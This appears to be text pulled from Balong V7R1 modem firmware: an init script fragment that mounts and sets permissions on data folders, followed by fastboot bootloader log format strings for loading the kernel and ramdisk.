#    mount yaffs2 mtd@/yaffs2 /data nosuid nodev
#    mount yaffs2 mtd@cache /cache nosuid nodev
    mkdir /data/userdata
    mkdir /data/equipdata
#service insmodko /etc/
#    oneshot
#service autorun /etc/
#    oneshot
on post-fs
    # once everything is setup, no need to modify /
    mount rootfs rootfs / rw remount
    # We chown/chmod /data again so because mount is run as root + defaults
    chown system system /data
    chmod 0771 /data
    chmod 0771 /app
    chmod 0777 /data/userdata
    chmod 0777 /data/equipdata
service balonginit /bin/balonginit  

start flash read kernel image(offset:0x%x len:0x%x)
finish flash read kernel image(skip_len=0x%x)
start flash read ramdisk image(offset:0x%x len:0x%x)
finish flash read ramdisk image(skip_len=0x%x)
start wait c core...
finish waiting...
kernel  @ %x (%d bytes)
ramdisk @ %x (%d bytes)
mem=50M console=null
cmdline = '%s'
Booting Linux
BalongV7R1 ASIC ACore fastboot...
 hdr is NULL
 Bootimg magic is '%s'